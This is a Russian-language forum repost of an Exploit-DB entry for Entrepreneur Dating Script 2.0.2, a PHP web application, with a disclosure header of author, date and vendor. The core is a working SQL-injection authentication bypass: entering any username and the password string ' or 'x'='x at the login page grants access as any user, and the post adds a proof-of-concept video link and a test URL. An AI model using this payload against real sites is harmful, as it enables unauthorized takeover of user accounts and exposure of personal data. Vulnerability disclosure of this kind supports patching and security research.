Exploit Entrepreneur Dating Script 2.0.2 - Authentication Bypass

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
43995
Проверка EDB
  1. Пройдено
Автор
L0RD
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
N/A
Дата публикации
2018-02-07
Entrepreneur Dating Script 2.0.2 - Authentication Bypass
Код:
# Exploit Title: Entrepreneur Dating Script 2.0.2 - Authentication Bypass
# Dork: N/A
# Date: 2018-02-07
# Exploit Author: Borna nematzadeh (L0RD) or [email protected]
# Vendor Homepage: https://www.phpscriptsmall.com/product/entrepreneur-dating-script/
# Version: 2.0.2
# Category: Webapps
# CVE: N/A
# # # # #
# Description:
# With this exploit,attacker can login as any user without any authentication.
# # # # #
# Proof of Concept :

# 1) First go to login page .

# 2) Username : anything , Password : ' or 'x'='x

PoC Video :
http://s8.picofile.com/file/8318741292/Autentication_Bypass.mp4.html

Test : http://server/login.php?lerr
 
Источник
www.exploit-db.com

Похожие темы